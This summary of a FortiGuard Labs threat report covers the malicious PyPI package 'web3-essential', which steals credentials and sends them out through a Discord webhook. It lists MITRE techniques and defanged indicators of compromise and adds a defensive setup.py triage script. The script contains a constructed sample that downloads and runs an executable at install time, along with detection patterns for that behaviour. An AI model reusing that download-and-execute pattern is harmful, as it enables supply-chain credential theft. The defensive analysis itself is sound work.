Supply Chain Attack by New Malicious Python Package, “web3-essential” | FortiGuard Labs

FortiGuard Labs detected a zero-day in a PyPI package named “web3-essential,” published by a newly joined user known as ‘Trexon’ on January 26, 2023. The package downloads and executes a Go-based binary to steal sensitive data and exfiltrate it via a Discord webhook.

Keypoints

  • The FortiGuard Labs team identified a new 0-day in a PyPI package called “web3-essential,” published on January 26, 2023 by author ‘Trexon’ who had just joined the repository.
  • The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.
  • The downloaded executable appears to be a Go-compiled binary named ily.exe, which creates DB files in the %USER%\AppData\Local\cloudflare-warp-cache\raw folder to record sensitive data and credentials.
  • Code strings inside the binary reference keywords such as ‘virus’, ‘wallets’, ‘browsers’, ‘login’, and ‘passwords’, indicating credential-stealing behavior across browsers and wallets.
  • An embedded Discord webhook URL and the use of a Go package ‘dishooks’ suggest data exfiltration via Discord, potentially linked to the “Spidey Bot” malware family.
  • Fortinet notes that the PyPI package was taken down after notification, and FortiGuard Web Filtering blocks the download URL associated with this threat.

MITRE Techniques

  • [T1195] Supply Chain – The malicious package was published by a newly joined author on the same day they joined the repository. ‘The author joined … and published on January 26, 2023’…
  • [T1105] Ingress Tool Transfer – The setup.py installation script downloads and runs an executable file as part of its installation. ‘downloads and runs an executable file as a part of its installation.’
  • [T1059] Command and Scripting Interpreter – The installer executes a downloaded binary as part of the installation process. ‘downloads and runs an executable file as a part of its installation.’
  • [T1074] Data Staged – The malware creates DB files in the ‘%USER%\AppData\Local\cloudflare-warp-cache\raw’ folder to record sensitive data and credentials. ‘creates DB files in the … folder. This may be used for recording sensitive data and credentials.’
  • [T1555.003] Credentials from Web Browsers – The binary contains keywords such as ‘browsers’, ‘login’, and ‘passwords’, indicating credential access from browser data. “keywords of interest include, ‘virus’, ‘wallets’, ‘browsers’, ‘login’, and ‘passwords’.”
  • [T1567.002] Exfiltration to Web Services – The malware uses a Discord webhook URL and the Go package ‘dishooks’, implying data exfiltration via Discord. “It uses a Go package, ‘dishooks’, which is a Discord webhook API wrapper. Within the URL, we see that it may be related to a ‘Spidey Bot’ malware which is known to steal personal information through Discord.”
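As an added defender's example (not code from the Fortinet report or from the package itself): a static triage routine that parses a setup.py with Python's ast module and flags the install-time pattern described in the keypoints and in T1105/T1567.002 above: a network fetch call, a process-execution call, and Discord attachment or webhook URLs in string literals. SAMPLE_SETUP_PY is a constructed stand-in modelled on the described behaviour, and the URL in it is a placeholder.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour."""
import ast
import re

# Coarse heuristics: names of calls that fetch remote content or run code/processes.
FETCH_CALLS = {"urlopen", "urlretrieve", "get", "request"}
EXEC_CALLS = {"system", "popen", "run", "call", "Popen", "check_output", "startfile", "exec"}
# Discord attachment (payload hosting) or webhook (exfiltration) URLs, as in the IoCs.
DISCORD_RE = re.compile(r"discord(?:app)?\.com/(?:api/webhooks|attachments)/", re.I)

# Constructed sample modelled on the described behaviour; NOT the real package's code.
SAMPLE_SETUP_PY = '''
from setuptools import setup
import os, urllib.request
urllib.request.urlretrieve("https://cdn.discordapp.com/attachments/0/0/ily.exe", "ily.exe")
os.startfile("ily.exe")
setup(name="web3-essential", version="0.1")
'''

def _call_name(node):
    """Return the final name of a call target, e.g. 'startfile' for os.startfile(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""

def triage_setup_py(source):
    """Return sorted (line, category, detail) findings for a setup.py source string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in FETCH_CALLS:
                findings.append((node.lineno, "fetch", name))
            elif name in EXEC_CALLS:
                findings.append((node.lineno, "exec", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if DISCORD_RE.search(node.value):
                findings.append((node.lineno, "discord-url", node.value))
    return sorted(findings)

def is_suspicious(source):
    """Fetch plus exec at install time is the web3-essential pattern; flag for review."""
    categories = {category for _, category, _ in triage_setup_py(source)}
    return "fetch" in categories and "exec" in categories
```

The name sets are deliberately broad (e.g. a plain `.get()` also matches), so treat hits as review leads rather than verdicts.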

Indicators of Compromise

  • [File] ily.exe – The downloaded malicious binary.
  • [Hash] 43c89b9263f78ef870bf205e92f7912c8b2845d33391b46cd747d45a5632aea0
  • [URL] hxxps://cdn[.]discordapp[.]com/attachments/1068100530498449468/1068239485613125702/ily[.]exe
  • [URL] hxxps://discordapp[.]com/api/webhooks/1068100542682902558/9JUsLnJZLyEkc_bGS85KTa5M1VWZ2J496v6Ruo7oUclFE08osfXNZL_OK5YDGOPYHLFy

Read more: https://www.fortinet.com/blog/threat-research/supply-chain-attack-by-new-malicious-python-package-web3-essential